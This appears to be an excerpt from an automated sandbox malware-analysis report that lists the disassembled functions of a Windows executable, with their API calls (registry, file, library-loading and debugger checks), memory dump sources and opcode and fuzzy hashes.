                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_Timer$Killwcscpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3812282468-0
                                                                                                                    • Opcode ID: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                                                                                    • Instruction ID: 5eb276c8ec3db89c09b6c62390bc957cacd0b935f3b3fa2d2e161a8b2e3c1b3a
                                                                                                                    • Opcode Fuzzy Hash: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                                                                                    • Instruction Fuzzy Hash: FE31D162A0D7D287EB618F2192402B93799EB54FC8F5C4036CE8D5B749CF2ED648CB50
                                                                                                                    Function 00007FF655FE6F60 Relevance: 4.6, APIs: 3, Instructions: 57registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF655FE6F52,?,?,?,?,?,?,00007FF655FE782C), ref: 00007FF655FE6FA5
                                                                                                                    • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF655FE6F52,?,?,?,?,?,?,00007FF655FE782C), ref: 00007FF655FE6FD3
                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF655FE6F52,?,?,?,?,?,?,00007FF655FE782C), ref: 00007FF655FE6FFA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3677997916-0
                                                                                                                    • Opcode ID: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                                                                    • Instruction ID: f1445c4b6a47ea1b5a13d399d31b1702d901d503ab45263948b57d9a95c7f43c
                                                                                                                    • Opcode Fuzzy Hash: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                                                                    • Instruction Fuzzy Hash: 05218B37A18B8287D7518F25F54496E73A5FB98B88B481131EB8D93B14DF39E814CB00
                                                                                                                    Function 00007FF656009118 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1703294689-0
                                                                                                                    • Opcode ID: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                                                                    • Instruction ID: 16ad3f7a2f1bb366893166153f4d93384e55d5c21ad7e2e6ae64f4ed644d0907
                                                                                                                    • Opcode Fuzzy Hash: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                                                                    • Instruction Fuzzy Hash: 13E09220B0874582EF556F619E453B513565F84755F496438C84EA7392CD3EE44DC210
                                                                                                                    Function 00007FF655FF66C0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 466COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Init_thread_footer
                                                                                                                    • String ID: CALL
                                                                                                                    • API String ID: 1385522511-4196123274
                                                                                                                    • Opcode ID: c55c44c6d0d13951f19519dc9035136dc729a68a08e1c84e3f6bf6e2d6ff621d
                                                                                                                    • Instruction ID: c692c0eedf44586c6adb93fe95c481003659a44bb507baa19cbbb3acb8e66404
                                                                                                                    • Opcode Fuzzy Hash: c55c44c6d0d13951f19519dc9035136dc729a68a08e1c84e3f6bf6e2d6ff621d
                                                                                                                    • Instruction Fuzzy Hash: C522BE36B086428AEB20DF64D1843BC37B1FB54B88F584536DA4DA7B99DF39E849C740
                                                                                                                    Function 00007FF655FE6838 Relevance: 3.1, APIs: 2, Instructions: 100fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                                                                                    • Instruction ID: 0cd8fad99936b712decb94c9f94abee3bafd5b729448aec119e1b5d83020055d
                                                                                                                    • Opcode Fuzzy Hash: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                                                                                    • Instruction Fuzzy Hash: 4F41A172D0864782E7A08F10E91433A77A0EF45BB8F185231DA6DA76D5CF7EE908CB40
                                                                                                                    Function 00007FF655FE6460 Relevance: 3.1, APIs: 2, Instructions: 91libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$Load$AddressFreeProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2632591731-0
                                                                                                                    • Opcode ID: 4148032de61d84ae77990a54cc2b1f6886a047abe3d4ed031ab241bf62c2a7ff
                                                                                                                    • Instruction ID: 17e7e853525ac5843780aab4b1204291ae8021ae2d9e96a5b35d7719fd667cd7
                                                                                                                    • Opcode Fuzzy Hash: 4148032de61d84ae77990a54cc2b1f6886a047abe3d4ed031ab241bf62c2a7ff
                                                                                                                    • Instruction Fuzzy Hash: AA419F26B14A1686EB60DF25E9543FC23A0FF44B8CF484131EA0DA769ADF7DD859CB40
                                                                                                                    Function 00007FF655FE6258 Relevance: 3.1, APIs: 2, Instructions: 72windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1144537725-0
                                                                                                                    • Opcode ID: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                                                                                    • Instruction ID: 55e1c7978265999fdf0d3fc4b557b2b85f65883c694b73e73b22fc94a47c954a
                                                                                                                    • Opcode Fuzzy Hash: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                                                                                    • Instruction Fuzzy Hash: ED419F75909B8686EB918F11F5443A933A8FB48B8CF480135DE4DA7759CF7DD944CB10
                                                                                                                    Function 00007FF656023E9C Relevance: 3.0, APIs: 2, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF65601A2E2), ref: 00007FF656023EB0
                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF65601A2E2), ref: 00007FF656023F15
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentStrings$Free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3328510275-0
                                                                                                                    • Opcode ID: 7a2552942933b56ccb1f3da2e42ebda5c79027b354ecde1dfe545767dcb9d8c9
                                                                                                                    • Instruction ID: 799b2d65d04e455313df9188b43bee042b8be8416348ceeb4bb022c3a66faea9
                                                                                                                    • Opcode Fuzzy Hash: 7a2552942933b56ccb1f3da2e42ebda5c79027b354ecde1dfe545767dcb9d8c9
                                                                                                                    • Instruction Fuzzy Hash: 3401D222B08B4181EE25AF16E90106E6760EF88FE0B8C5231EE5E537D5EE3DE849C200
                                                                                                                    Function 00007FF655FE3730 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsThemeActive.UXTHEME ref: 00007FF655FE3756
                                                                                                                      • Part of subcall function 00007FF656009334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF656009348
                                                                                                                      • Part of subcall function 00007FF655FE36E8: SystemParametersInfoW.USER32 ref: 00007FF655FE3705
                                                                                                                      • Part of subcall function 00007FF655FE36E8: SystemParametersInfoW.USER32 ref: 00007FF655FE3725
                                                                                                                      • Part of subcall function 00007FF655FE37B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF655FE3785), ref: 00007FF655FE37F2
                                                                                                                      • Part of subcall function 00007FF655FE37B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF655FE3785), ref: 00007FF655FE3807
                                                                                                                      • Part of subcall function 00007FF655FE37B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF655FE3785), ref: 00007FF655FE388D
                                                                                                                      • Part of subcall function 00007FF655FE37B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF655FE3785), ref: 00007FF655FE3924
                                                                                                                    • SystemParametersInfoW.USER32 ref: 00007FF655FE3797
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4207566314-0
                                                                                                                    • Opcode ID: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                                                                    • Instruction ID: 1497fecf506405598283c104b85995bd72324154ce586af51efc5a47f6842227
                                                                                                                    • Opcode Fuzzy Hash: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                                                                    • Instruction Fuzzy Hash: 0B0112B4E0C2438AF7549F61AA195793261AF14704F8C0135D54DE72A2DE3EB88CCB00
                                                                                                                    Function 00007FF65601B3C0 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 485612231-0
                                                                                                                    • Opcode ID: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                                                                    • Instruction ID: 6e2787d19bf771fa9603066f788774a710864a9356aa9bb6739d600c35b41ccc
                                                                                                                    • Opcode Fuzzy Hash: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                                                                    • Instruction Fuzzy Hash: DEE04650E0950382FF0AABB3DE151782692AF88B48B4C4034C80DEB252EE3EA49EC601
                                                                                                                    Function 00007FF6560204B8 Relevance: 2.6, APIs: 2, Instructions: 55COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseErrorHandleLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 918212764-0
                                                                                                                    • Opcode ID: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                                                                    • Instruction ID: fb44efbff1eb5101534ca0b0597fe9a8cc17d2d298163588befbde87e4c34386
                                                                                                                    • Opcode Fuzzy Hash: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                                                                    • Instruction Fuzzy Hash: 7C119361B0C34641FEA49765EF9427E52825F947A8F4C4135EA2FE63D2DD6EA84CC201
                                                                                                                    Function 00007FF655FF1475 Relevance: 2.0, APIs: 1, Instructions: 533COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Init_thread_footer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1385522511-0
                                                                                                                    • Opcode ID: f93ec442a7ba0cc11a5443e7b35fed9f8b1ff32b547cd1dd2020b4df4ad6a075
                                                                                                                    • Instruction ID: 0936e2ca111afa9da0d54ba14904407144cc6720bc0d3c50a1faadbe3851bde4
                                                                                                                    • Opcode Fuzzy Hash: f93ec442a7ba0cc11a5443e7b35fed9f8b1ff32b547cd1dd2020b4df4ad6a075
                                                                                                                    • Instruction Fuzzy Hash: 2B32D326A0C68286EB60CB15D544BB96761FF84F88F5C4131DE4EA7BA5DF3EE845CB00
                                                                                                                    Function 00007FF6560420D6 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    • Opcode ID: 2f2a7f0b4b99b489bd401bf82ee2ae899ba245d3bdd8c743c662dd8b12cd4bc5
                                                                                                                    • Instruction ID: adc16189f4d547eaa303f34f5d9ce46fcb6f0b8035f971ce9f534e79a73c1a78
                                                                                                                    • Opcode Fuzzy Hash: 2f2a7f0b4b99b489bd401bf82ee2ae899ba245d3bdd8c743c662dd8b12cd4bc5
                                                                                                                    • Instruction Fuzzy Hash: 5041AC26B08A4186FB61DF61D1803AC23A1FF54B88F484535CE0DA7B99CFBDE889C740
                                                                                                                    Function 00007FF656008FAC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3947729631-0
                                                                                                                    • Opcode ID: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                                                                    • Instruction ID: d1ffe61e845846fe2d686dbfd4daa263d7a9a455bb2a83815ba47b2d4a790b59
                                                                                                                    • Opcode Fuzzy Hash: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                                                                    • Instruction Fuzzy Hash: 0141AD31E1C65286FF649F15DA5027862A1AF90B54F8C6039DA4EE76D1DF3FE889C340
                                                                                                                    Function 00007FF6560148E0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    • Opcode ID: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                                                                    • Instruction ID: 832814776c5f86094595135567b75ad1c881a4bbbc39987c4627a6b1b9a8458f
                                                                                                                    • Opcode Fuzzy Hash: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                                                                    • Instruction Fuzzy Hash: 2421C821E0C28282EA519F51DD0017E92A5BF44B88F5C4130EA4CE7B96DFBED845C780
                                                                                                                    Function 00007FF656026D04 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    • Opcode ID: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                                                                    • Instruction ID: 698f0b91d6e12e7c33f72aeeedb56fd0420885d3b7f78456ce7d90647f755f9e
                                                                                                                    • Opcode Fuzzy Hash: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                                                                    • Instruction Fuzzy Hash: 4121D632A1868687EB658F25E94037976A1EF80B94F2C4234DA5DDB6D5DF3DD848CB00
                                                                                                                    Function 00007FF656065B80 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
